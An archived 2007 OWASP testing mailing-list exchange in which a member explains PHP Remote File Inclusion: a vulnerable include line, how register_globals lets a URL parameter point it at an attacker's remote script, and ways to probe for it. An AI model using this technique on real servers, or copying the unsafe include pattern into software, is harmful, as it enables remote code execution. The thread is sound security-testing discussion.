[Owasp-testing] Remote File include vulnerability
David.Byrne at echostar.com
Tue Apr 10 13:25:39 EDT 2007
In my experience, you usually need the source code to do this. The idea
is that on some platforms (mostly PHP), script files can be included at
include($base_path . "/utils.php");
If register_globals is enabled (older versions of PHP enable it by
default), and base_path is never initialized in the script, base_path
can be set from the URL
This will run the attack PHP file on the victim web server. I've seen
this happen mostly on files that are not intended to be called alone.
For example, a utility library that usually gets included after a
configuration file that sets base_path.
I don't know of effective methods for testing this without access to the
code. I suppose a particularly poorly written app might have a path in
the URL query by design, which could then be modified. You could also
try to use common variable names (like base_path), although you would
still have to find a vulnerable script which is probably never called
directly by a browser.
From: owasp-testing-bounces at lists.owasp.org
[mailto:owasp-testing-bounces at lists.owasp.org] On Behalf Of Denise
Sent: Tuesday, April 10, 2007 10:45 AM
Subject: [Owasp-testing] Remote File include vulnerability
Hi to all,
Can someone please tell me, how to carry out penetration
testing for Remote File Include Vulnerability?
-------------- next part --------------
An HTML attachment was scrubbed...
More information about the Owasp-testing